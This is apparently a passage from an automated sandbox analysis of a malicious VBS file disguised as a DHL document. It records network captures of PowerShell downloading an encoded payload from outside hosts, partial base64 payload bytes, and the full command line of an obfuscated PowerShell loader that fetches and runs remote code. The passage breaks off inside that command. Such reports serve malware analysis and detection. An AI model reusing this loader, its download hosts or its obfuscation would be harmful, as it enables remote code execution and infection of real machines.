                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                              Apr 26, 2024 07:41:49.208837032 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 05:41:49 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.549704188.212.111.1344432132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 05:39:56 UTC172OUTGET /Methink1.thn HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: europrotectie.ro
                                              Connection: Keep-Alive
                                              2024-04-26 05:39:56 UTC243INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 05:39:56 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Last-Modified: Thu, 25 Apr 2024 08:04:28 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 465652
                                              Vary: Accept-Encoding,User-Agent
                                              2024-04-26 05:39:56 UTC7949INData Raw: 63 51 47 62 63 51 47 62 75 32 61 69 47 51 44 72 41 72 62 5a 63 51 47 62 41 31 77 6b 42 4f 73 43 2f 69 6c 78 41 5a 75 35 47 64 61 2b 53 6e 45 42 6d 2b 73 43 4e 4b 79 42 77 54 54 73 41 74 64 78 41 5a 76 72 41 69 33 76 67 63 47 7a 50 54 37 65 63 51 47 62 63 51 47 62 36 77 49 33 6c 58 45 42 6d 37 72 78 71 47 39 4a 63 51 47 62 63 51 47 62 63 51 47 62 36 77 4b 41 7a 54 48 4b 36 77 4c 78 37 75 73 43 4e 4a 6d 4a 46 41 76 72 41 6d 6d 68 36 77 4c 44 41 64 48 69 36 77 49 63 37 33 45 42 6d 34 50 42 42 4f 73 43 59 34 35 78 41 5a 75 42 2b 56 71 41 4d 67 4a 38 79 65 73 43 4d 72 58 72 41 6e 79 34 69 30 51 6b 42 4f 73 43 71 77 58 72 41 6a 63 52 69 63 4e 78 41 5a 74 78 41 5a 75 42 77 7a 58 6d 75 77 48 72 41 71 65 65 63 51 47 62 75 70 37 73 67 4e 39 78 41 5a 74 78 41 5a 75
                                              Data Ascii: cQGbcQGbu2aiGQDrArbZcQGbA1wkBOsC/ilxAZu5Gda+SnEBm+sCNKyBwTTsAtdxAZvrAi3vgcGzPT7ecQGbcQGb6wI3lXEBm7rxqG9JcQGbcQGbcQGb6wKAzTHK6wLx7usCNJmJFAvrAmmh6wLDAdHi6wIc73EBm4PBBOsCY45xAZuB+VqAMgJ8yesCMrXrAny4i0QkBOsCqwXrAjcRicNxAZtxAZuBwzXmuwHrAqeecQGbup7sgN9xAZtxAZu
                                              2024-04-26 05:39:57 UTC8000INData Raw: 69 77 4c 53 79 4f 4e 66 38 44 36 66 61 50 6e 7a 46 4e 62 36 65 76 78 7a 6b 2f 39 6e 4c 49 7a 57 32 30 50 76 46 74 4d 65 36 39 4e 55 52 53 54 35 70 56 38 6f 4e 2f 63 64 47 73 75 78 4a 2b 75 74 35 6f 67 38 75 62 54 31 47 31 55 4c 39 75 71 62 78 54 62 71 6d 38 55 32 36 70 76 46 4e 75 71 62 78 54 62 71 6d 38 55 32 38 4e 7a 2b 62 44 61 58 6d 63 68 52 5a 53 56 4e 44 62 55 56 64 77 72 71 49 68 77 36 32 68 38 35 6f 74 56 72 31 71 65 53 78 73 67 66 43 74 48 59 4b 6f 32 66 6a 67 72 6e 44 53 72 46 38 75 56 4b 50 73 59 42 55 38 72 6e 45 35 52 56 5a 65 56 4b 49 47 36 4c 66 44 38 38 35 30 39 6f 33 47 4a 76 53 2b 51 5a 63 6d 6e 79 54 76 66 45 6b 76 6d 68 6e 39 4d 75 32 70 50 78 38 55 4b 33 6e 72 34 69 79 45 38 67 72 59 6b 41 30 70 59 7a 30 58 76 4d 39 46 65 31 50 2f 61
                                              Data Ascii: iwLSyONf8D6faPnzFNb6evxzk/9nLIzW20PvFtMe69NURST5pV8oN/cdGsuxJ+ut5og8ubT1G1UL9uqbxTbqm8U26pvFNuqbxTbqm8U28Nz+bDaXmchRZSVNDbUVdwrqIhw62h85otVr1qeSxsgfCtHYKo2fjgrnDSrF8uVKPsYBU8rnE5RVZeVKIG6LfD88509o3GJvS+QZcmnyTvfEkvmhn9Mu2pPx8UK3nr4iyE8grYkA0pYz0XvM9Fe1P/a
                                              2024-04-26 05:39:57 UTC8000INData Raw: 41 49 4c 35 54 36 49 55 6b 74 75 42 55 61 54 6f 47 66 41 71 6d 79 33 56 51 56 74 65 46 6a 75 5a 6d 33 68 58 70 4b 71 54 38 47 79 46 4d 61 38 45 76 69 67 4c 44 74 73 4a 50 6c 66 73 5a 62 41 51 6f 6b 30 2f 44 41 49 63 45 73 33 79 78 67 46 45 33 64 66 56 54 59 74 41 66 43 6a 74 68 43 6a 6d 34 4d 41 64 46 6e 4e 74 69 34 55 78 51 71 4d 6d 56 6a 68 6e 38 5a 4d 49 42 47 44 52 49 67 52 4c 63 42 51 50 2b 37 58 56 68 6c 6c 45 6c 70 42 6f 4a 4a 4e 4d 54 69 49 55 6b 31 75 43 30 59 75 70 6d 33 2b 42 77 6f 4a 55 34 41 68 71 34 76 6a 31 38 6e 65 6e 2f 4a 58 63 4b 73 31 36 5a 37 34 4a 76 79 37 51 43 52 52 41 6b 55 50 79 43 50 2f 68 56 61 49 59 30 46 2f 53 38 78 57 31 6f 51 76 72 55 39 51 2f 30 76 38 56 41 4e 72 46 42 64 6a 4e 73 5a 6c 54 72 44 7a 67 61 68 6a 61 7a 64 48
                                              Data Ascii: AIL5T6IUktuBUaToGfAqmy3VQVteFjuZm3hXpKqT8GyFMa8EvigLDtsJPlfsZbAQok0/DAIcEs3yxgFE3dfVTYtAfCjthCjm4MAdFnNti4UxQqMmVjhn8ZMIBGDRIgRLcBQP+7XVhllElpBoJJNMTiIUk1uC0Yupm3+BwoJU4Ahq4vj18nen/JXcKs16Z74Jvy7QCRRAkUPyCP/hVaIY0F/S8xW1oQvrU9Q/0v8VANrFBdjNsZlTrDzgahjazdH
                                              2024-04-26 05:39:57 UTC8000INData Raw: 36 64 4e 38 4f 53 4a 50 4b 74 76 46 43 51 66 6c 78 54 62 71 6f 64 78 56 61 35 76 6e 57 5a 32 62 68 54 62 49 35 68 44 55 42 65 7a 46 64 75 71 6f 78 34 57 5a 6d 49 49 42 4c 59 69 36 39 6e 6f 32 37 46 32 2f 58 63 49 50 39 5a 55 52 52 53 79 79 48 37 39 6e 36 31 52 55 68 4d 2b 72 53 59 6a 69 58 56 61 57 39 55 41 76 6e 54 75 2f 57 66 2b 53 65 5a 61 51 2b 52 54 68 6d 63 35 69 46 4a 4d 62 68 70 47 6b 37 56 75 31 77 4a 30 44 43 6e 51 4a 35 59 67 66 57 4c 34 78 6d 4f 4a 68 43 71 56 62 5a 41 4f 36 55 75 61 6f 52 78 64 47 4f 68 6e 58 45 79 33 4e 41 62 7a 51 6c 6e 4b 53 35 53 74 78 49 38 33 44 46 4a 79 58 6d 6f 78 63 6c 35 68 4e 70 2b 65 69 6a 6d 71 34 39 36 66 71 6c 70 63 33 67 56 75 69 75 37 69 32 6f 72 72 43 31 70 45 78 35 4d 62 4b 2b 59 71 6a 4d 47 68 59 74 35 61
                                              Data Ascii: 6dN8OSJPKtvFCQflxTbqodxVa5vnWZ2bhTbI5hDUBezFduqox4WZmIIBLYi69no27F2/XcIP9ZURRSyyH79n61RUhM+rSYjiXVaW9UAvnTu/Wf+SeZaQ+RThmc5iFJMbhpGk7Vu1wJ0DCnQJ5YgfWL4xmOJhCqVbZAO6UuaoRxdGOhnXEy3NAbzQlnKS5StxI83DFJyXmoxcl5hNp+eijmq496fqlpc3gVuiu7i2orrC1pEx5MbK+YqjMGhYt5a
                                              2024-04-26 05:39:57 UTC8000INData Raw: 33 6c 71 76 74 38 44 6e 57 2f 6e 73 36 71 4a 4d 66 4e 32 30 6b 2b 32 54 51 61 2b 43 33 66 47 67 30 4b 43 63 55 78 74 64 56 4a 2f 70 58 57 4f 48 41 31 69 77 6a 47 66 56 70 70 74 46 4e 76 37 31 73 67 73 64 52 47 56 4b 73 52 67 2b 35 63 72 6e 71 59 69 6d 6c 31 43 52 79 4f 4a 46 64 55 33 56 74 4f 75 71 49 6b 56 2b 75 79 38 61 53 71 33 4a 49 74 56 4e 54 66 52 6c 61 42 4d 56 48 4a 47 65 76 43 37 78 53 2f 43 56 2f 2f 54 71 68 43 56 7a 4c 4e 50 7a 46 62 48 68 5a 4b 33 54 59 6b 51 31 59 65 6e 64 4f 37 6d 45 37 46 73 65 46 70 59 6b 67 58 62 4d 65 37 57 71 73 33 76 77 6f 73 32 35 76 54 53 75 76 4b 51 45 64 35 6a 53 52 63 37 34 55 4b 2b 43 75 35 59 4e 70 61 59 46 4d 46 47 4e 35 63 44 37 72 74 48 61 47 49 4d 41 79 4e 39 56 32 56 67 72 45 7a 4d 48 7a 38 71 32 56 79 45
                                              Data Ascii: 3lqvt8DnW/ns6qJMfN20k+2TQa+C3fGg0KCcUxtdVJ/pXWOHA1iwjGfVpptFNv71sgsdRGVKsRg+5crnqYiml1CRyOJFdU3VtOuqIkV+uy8aSq3JItVNTfRlaBMVHJGevC7xS/CV//TqhCVzLNPzFbHhZK3TYkQ1YendO7mE7FseFpYkgXbMe7Wqs3vwos25vTSuvKQEd5jSRc74UK+Cu5YNpaYFMFGN5cD7rtHaGIMAyN9V2VgrEzMHz8q2VyE
                                              2024-04-26 05:39:57 UTC8000INData Raw: 41 53 2f 4b 36 67 41 63 79 69 62 51 6b 63 6a 69 52 33 6c 4e 77 6b 74 4a 64 68 2b 64 46 53 69 37 75 30 30 30 42 2b 6e 2f 42 51 54 4c 70 4f 49 46 55 44 39 6b 45 71 7a 51 50 30 55 57 4c 6c 4c 33 67 37 47 5a 70 51 63 47 4a 35 37 51 78 64 36 4d 6d 64 36 6d 43 78 63 73 47 38 4a 6b 51 6a 30 36 73 36 45 4b 35 6a 53 30 55 48 48 32 46 32 38 42 38 4f 31 2f 61 47 4f 68 57 6f 74 2f 35 69 62 4c 68 4d 35 45 37 67 4c 58 41 30 2f 62 4c 56 71 44 30 47 52 79 62 63 56 33 66 66 68 6c 53 7a 61 77 36 54 46 5a 6f 61 42 49 4e 4f 34 54 52 46 64 66 56 77 37 53 59 4f 67 48 57 32 50 38 30 6f 6c 78 67 79 46 43 54 36 59 57 6d 31 6d 65 37 32 51 59 4e 50 69 34 6d 38 55 32 36 70 76 46 4e 75 71 62 78 54 62 71 6d 38 55 32 36 70 76 46 4e 75 71 62 32 35 38 72 6e 79 35 2b 41 4d 79 75 53 5a 46
                                              Data Ascii: AS/K6gAcyibQkcjiR3lNwktJdh+dFSi7u000B+n/BQTLpOIFUD9kEqzQP0UWLlL3g7GZpQcGJ57Qxd6Mmd6mCxcsG8JkQj06s6EK5jS0UHH2F28B8O1/aGOhWot/5ibLhM5E7gLXA0/bLVqD0GRybcV3ffhlSzaw6TFZoaBINO4TRFdfVw7SYOgHW2P80olxgyFCT6YWm1me72QYNPi4m8U26pvFNuqbxTbqm8U26pvFNuqb258rny5+AMyuSZF
                                              2024-04-26 05:39:57 UTC8000INData Raw: 6f 45 50 77 62 6b 69 67 4d 7a 75 4a 48 72 64 6f 33 53 71 7a 48 58 43 4e 41 56 6a 65 6c 47 61 35 5a 54 78 78 57 78 62 46 44 45 73 30 48 52 79 4a 6e 6d 45 64 4d 46 77 68 64 47 38 58 75 69 74 6c 36 37 2b 7a 4f 34 6b 67 61 67 4a 6c 65 74 7a 4c 55 52 6a 47 70 38 51 6d 59 63 4e 70 71 53 69 51 6c 72 6d 4c 31 5a 46 52 79 4f 4f 48 64 6f 33 56 39 65 71 76 55 2b 30 35 76 72 4d 46 61 74 55 2b 62 61 55 6b 2f 41 7a 51 38 75 38 6e 34 67 38 4a 71 43 44 7a 6a 49 6a 37 72 6b 47 64 46 59 74 45 6c 4b 57 38 70 48 5a 59 7a 4c 6f 65 47 65 63 37 6d 6d 6e 6f 42 67 55 32 36 58 67 6d 63 36 71 62 30 33 6e 66 6a 64 46 59 6a 76 6b 6a 75 45 72 72 6b 45 72 32 6f 75 56 4d 76 6f 75 48 38 51 6a 56 6e 32 45 59 49 71 32 2f 6a 4d 4b 4f 5a 75 76 5a 2b 32 32 50 46 4f 56 2f 72 30 32 57 42 48 6f
                                              Data Ascii: oEPwbkigMzuJHrdo3SqzHXCNAVjelGa5ZTxxWxbFDEs0HRyJnmEdMFwhdG8Xuitl67+zO4kgagJletzLURjGp8QmYcNpqSiQlrmL1ZFRyOOHdo3V9eqvU+05vrMFatU+baUk/AzQ8u8n4g8JqCDzjIj7rkGdFYtElKW8pHZYzLoeGec7mmnoBgU26Xgmc6qb03nfjdFYjvkjuErrkEr2ouVMvouH8QjVn2EYIq2/jMKOZuvZ+22PFOV/r02WBHo
                                              2024-04-26 05:39:57 UTC8000INData Raw: 78 62 62 71 6d 43 51 4a 4c 35 76 46 49 73 53 64 6d 67 69 69 31 6f 68 49 6f 7a 75 45 51 2f 52 54 30 75 4e 4e 75 62 79 32 71 7a 79 63 75 4a 34 45 42 2b 4e 42 48 59 57 66 42 75 35 54 48 44 49 76 38 52 4b 51 38 7a 55 52 68 47 31 4c 42 7a 31 78 47 39 36 39 7a 44 64 63 58 6a 67 32 65 6d 53 47 46 78 55 59 46 71 66 41 46 73 56 32 4c 70 6e 42 58 4c 69 65 7a 47 51 45 76 4b 51 6f 63 75 72 62 78 51 7a 5a 48 49 55 32 2f 6e 55 67 38 71 6e 5a 70 55 59 6e 4e 2f 59 38 43 75 63 75 4f 32 70 7a 5a 55 6f 68 71 72 4f 54 53 4e 38 54 51 6e 39 52 73 77 43 61 51 31 41 35 62 57 31 59 2f 77 43 32 74 68 4f 68 2f 65 6d 73 52 55 49 32 41 61 35 46 34 49 39 7a 48 59 66 61 32 2b 4a 4a 76 78 75 73 47 41 35 68 44 52 48 59 4d 38 51 68 37 67 72 6e 4a 50 56 50 46 79 56 47 4c 54 67 37 6e 54 34
                                              Data Ascii: xbbqmCQJL5vFIsSdmgii1ohIozuEQ/RT0uNNuby2qzycuJ4EB+NBHYWfBu5THDIv8RKQ8zURhG1LBz1xG969zDdcXjg2emSGFxUYFqfAFsV2LpnBXLiezGQEvKQocurbxQzZHIU2/nUg8qnZpUYnN/Y8CucuO2pzZUohqrOTSN8TQn9RswCaQ1A5bW1Y/wC2thOh/emsRUI2Aa5F4I9zHYfa2+JJvxusGA5hDRHYM8Qh7grnJPVPFyVGLTg7nT4
                                              2024-04-26 05:39:57 UTC8000INData Raw: 69 6b 4b 70 70 34 42 6e 6c 37 52 49 4f 44 6f 4b 77 4b 6d 42 4c 4d 35 74 36 70 71 59 56 50 64 44 2f 72 59 77 44 46 38 36 6c 58 61 6f 4e 75 71 62 78 76 61 76 4d 67 55 32 36 70 76 46 4e 75 71 62 78 54 62 71 6d 38 55 32 36 70 76 46 4e 75 71 62 78 53 31 6b 47 52 31 6d 47 7a 74 38 53 49 51 37 70 74 65 6b 6d 34 55 32 36 56 75 44 6b 57 71 62 78 54 62 71 6d 38 55 32 36 70 76 46 4e 75 71 62 78 54 62 71 6d 38 55 32 36 6f 54 79 35 74 35 6f 49 5a 35 75 61 69 73 2b 31 4f 38 31 53 74 69 56 2f 4c 49 32 51 61 4a 46 37 39 2f 4c 32 57 48 75 45 52 6a 32 67 2b 45 69 70 2f 6b 30 50 62 46 51 71 61 4c 59 6c 77 52 37 49 70 6b 34 56 4b 61 57 71 77 49 79 38 4e 59 4d 30 46 62 32 57 56 6a 4e 57 5a 5a 49 41 31 36 48 58 46 4a 4d 47 58 44 58 44 45 61 35 50 43 38 68 64 2f 75 54 43 51 66
                                              Data Ascii: ikKpp4Bnl7RIODoKwKmBLM5t6pqYVPdD/rYwDF86lXaoNuqbxvavMgU26pvFNuqbxTbqm8U26pvFNuqbxS1kGR1mGzt8SIQ7ptekm4U26VuDkWqbxTbqm8U26pvFNuqbxTbqm8U26oTy5t5oIZ5uais+1O81StiV/LI2QaJF79/L2WHuERj2g+Eip/k0PbFQqaLYlwR7Ipk4VKaWqwIy8NYM0Fb2WVjNWZZIA16HXFJMGXDXDEa5PC8hd/uTCQf
                                              2024-04-26 05:39:57 UTC8000INData Raw: 47 45 44 66 68 2b 56 70 75 49 72 54 4e 75 71 59 4a 43 54 6d 47 34 55 57 6d 6d 44 53 52 57 71 37 76 38 7a 39 36 45 55 48 4b 6d 59 4a 4c 50 72 37 69 65 79 47 33 2b 54 58 33 76 75 50 31 37 6a 33 78 4a 61 6d 58 46 6a 58 79 37 76 37 69 78 74 36 68 62 5a 71 6d 2b 58 4d 66 4e 51 6c 53 45 61 79 43 4b 65 4b 38 49 57 32 61 70 76 34 6f 74 74 53 70 56 75 71 47 30 55 32 35 53 51 58 6b 55 75 6b 70 56 65 71 47 30 55 32 2f 72 32 4d 36 4f 54 72 46 63 6b 4a 32 30 57 32 36 6f 61 34 5a 67 72 45 6d 43 62 47 47 38 55 31 43 37 4b 38 53 52 56 71 42 63 30 53 44 7a 47 57 31 4e 65 6c 65 6a 2f 36 44 36 62 6b 71 57 56 36 44 49 59 77 59 54 4d 56 74 5a 61 6d 55 31 65 32 79 38 35 71 6b 4f 70 47 48 6c 59 56 44 41 62 58 34 31 75 45 4e 76 30 71 4a 47 57 71 47 38 55 32 37 4b 64 35 31 6f 66
                                              Data Ascii: GEDfh+VpuIrTNuqYJCTmG4UWmmDSRWq7v8z96EUHKmYJLPr7ieyG3+TX3vuP17j3xJamXFjXy7v7ixt6hbZqm+XMfNQlSEayCKeK8IW2apv4ottSpVuqG0U25SQXkUukpVeqG0U2/r2M6OTrFckJ20W26oa4ZgrEmCbGG8U1C7K8SRVqBc0SDzGW1Nelej/6D6bkqWV6DIYwYTMVtZamU1e2y85qkOpGHlYVDAbX41uENv0qJGWqG8U27Kd51of


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.54971346.254.34.124431496C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 05:40:36 UTC179OUTGET /FIPWKWOaFXJGe178.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: duelvalenza.it
                                              Cache-Control: no-cache
                                              2024-04-26 05:40:36 UTC299INHTTP/1.1 301 Moved Permanently
                                              Date: Fri, 26 Apr 2024 05:40:36 GMT
                                              Server: Apache
                                              Location: http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin
                                              Cache-Control: max-age=1800
                                              Expires: Fri, 26 Apr 2024 06:10:36 GMT
                                              Content-Length: 254
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              2024-04-26 05:40:36 UTC254INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 75 65 6c 76 61 6c 65 6e 7a 61 2e 69 74 2f 46 49 50 57 4b 57 4f 61 46 58 4a 47 65 31 37 38 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin">here</a>.</p></body></html>


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:07:39:51
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs"
                                              Imagebase:0x7ff7720c0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:07:39:51
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeInfomUndeeUnd,rUnp,sGod,.SkraHIndpeAgerahided AlleTromrBvens Tep[Appl$Rri.iHoa,mDispp QuerhereoK mmvHjsleInd rAltesPaup]Conv=Trla$TromP vanlgubeaPerenRe slShrugSa vgUnqueHos,lBedss pseeConsr AutnItereslie2 Vre3Utop5 Bea ');$Republicanisms=Teucrium 'ResiDDe fr yniPosefStymt S ysShampFathr Traocardb SmdlPhote AcymOrdfe Ar,rMonosS ar.LndeDBrano H jw tilnKaoll ,igoAfpraTho dMiniFrykki upelDd.deAnal(Sult$St,cOPeriv SpaaAntarUly iScapePicncBedetRadio NonmBigaiPseuzTrkve Afg,Unbl$FlygFRet,eFri.lUnsptAlmelU.etaLet.zRefraAcourAduneDeput onetU,rue PrgrpergsNor.)lith ';$Republicanisms=$subinsertion[1]+$Republicanisms;$Feltlazaretters=$subinsertion[0];Regulerbare (Teucrium 'Symp$dhurg HonlS,lvoMultbOldfaUdmal ,ns:in.tT Hala StrkInhas,ntrtundegUn drFor nShidsKateeSpirrP.emnConveIzvo= lue(S udT AfkeIngrsSweatSoen-SynfPUd.ra LabtUsaahMowt Sang$StorF T neAtoml .oatShovlBlesaAbalz 